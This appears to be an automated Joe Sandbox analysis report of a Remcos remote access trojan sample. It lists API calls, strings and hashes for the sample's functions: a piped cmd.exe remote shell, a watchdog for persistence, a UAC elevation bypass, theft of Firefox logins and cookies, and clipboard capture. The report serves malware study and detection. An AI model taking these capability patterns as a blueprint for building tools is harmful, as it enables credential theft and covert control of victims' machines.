                                • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 123 446137-446143 124 446175-446180 call 4405dd 123->124 125 446145-446147 123->125 132 446182-446184 124->132 127 446160-446171 RtlAllocateHeap 125->127 128 446149-44614a 125->128 129 446173 127->129 130 44614c-446153 call 445545 127->130 128->127 129->132 130->124 135 446155-44615e call 442f80 130->135 135->124 135->127
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-13974260
                                • Opcode ID: 40b24dbe1f17985f058b8880f0b35abadd5faaf693f7cda90d1833beab63ca48
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: 40b24dbe1f17985f058b8880f0b35abadd5faaf693f7cda90d1833beab63ca48
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@$hdF
                                • API String ID: 3520204547-3475379602
                                • Opcode ID: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: (eF$8SG$PXG$PXG$NG$PG
                                • API String ID: 341183262-875132146
                                • Opcode ID: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID: hdF
                                • API String ID: 1771804793-665520524
                                • Opcode ID: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                • Opcode Fuzzy Hash: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
